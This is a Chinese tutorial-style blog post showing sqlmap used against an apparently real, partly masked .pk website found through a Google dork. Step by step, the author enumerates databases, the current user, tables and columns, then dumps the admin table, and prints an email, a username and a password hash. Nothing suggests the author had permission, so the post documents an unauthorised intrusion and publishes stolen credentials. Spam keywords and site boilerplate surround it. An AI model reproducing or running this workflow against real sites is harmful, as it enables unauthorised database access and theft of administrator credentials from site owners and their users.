第七色在线视频,2021少妇久久久久久久久久,亚洲欧洲精品成人久久av18,亚洲国产精品特色大片观看完整版,孙宇晨将参加特朗普的晚宴

為了賬號安全,請及時綁定郵箱和手機立即綁定

sqlmap的簡單實戰(zhàn)使用

標(biāo)簽:
MySQL

使用sqlmap进行试验:

<a href="</a>

Google Dorks:
这次使用:
inurl:.course.php?id=16

图片描述

  1. 对目标网站进行查询:

sqlmap.py -u http://www.xxxx/course.php?id=16

//sqlmap -V 1.0.11,会生成相关文件,包含payload以及注入类型

图片描述

参数介绍:

Parameter: id (GET),注入参数为GET注入:

注入类型有:

boolean-based blind       //基于布尔的盲注,也就是可以根据返回页面判断条件真假的注入
error-based   //报错型注入
time-based blind  //基于时间延迟注入
UNION query     //可联合查询注入

此外还有一种为:
stacked queries SQL injection //可多语句查询注入

the back-end DBMS is MySQL,back-end DBMS: MySQL >= 5.0使用数据库为MYSQL,版本为5.x
web application technology: PHP 5.3.29//Web应用程序技术

2.得到数据库:
sqlmap.py -u http://www.xxx.org.pk/course.php?id=16 --dbs
[]efnypvon_icd_db
[
]information_schema
图片描述
3.web当前使用的数据库
sqlmap.py -u http://www.xxxx/course.php?id=16 --current-db

current database:    'efnypvon_icd_db'

图片描述
4.web数据库所使用的账户
sqlmap.py -u http://www.xxx.pk/course.php?id=16 --current-user

current user:    'efnypvon_icd_usr@localhost'

图片描述

5.具体查看某一数据库:
sqlmap.py -u http://www.xxx.pk/course.php?id=16 -D efnypvon_icd_db --tables

图片描述
6.查看表的字段
sqlmap.py -u http://www.xxx.pk/course.php?id=16 -D efnypvon_icd_db -T icd_tbl_admin --columns
图片描述

7.得到字段内容:

sqlmap.py -u http://www.xxx.pk/course.php?id=16 -D efnypvon_icd_db -T icd_tbl_admin "fEmail,fPassword,fUserName,last_admiin,superadmin" --dump

图片描述

info@xxxx.pk
icdmaster
223880689d78a4d2c2e84607f13715ee
2016-11-30 09:15:28

thats all :D

點擊查看更多內(nèi)容
4人點贊

若覺得本文不錯,就分享一下吧!

評論

作者其他優(yōu)質(zhì)文章

正在加載中
感謝您的支持,我會繼續(xù)努力的~
掃碼打賞,你說多少就多少
贊賞金額會直接到老師賬戶
支付方式
打開微信掃一掃,即可進行掃碼打賞哦
今天注冊有機會得

100積分直接送

付費專欄免費學(xué)

大額優(yōu)惠券免費領(lǐng)

立即參與 放棄機會
微信客服

購課補貼
聯(lián)系客服咨詢優(yōu)惠詳情

幫助反饋 APP下載

慕課網(wǎng)APP
您的移動學(xué)習(xí)伙伴

公眾號

掃描二維碼
關(guān)注慕課網(wǎng)微信公眾號

舉報

0/150
提交
取消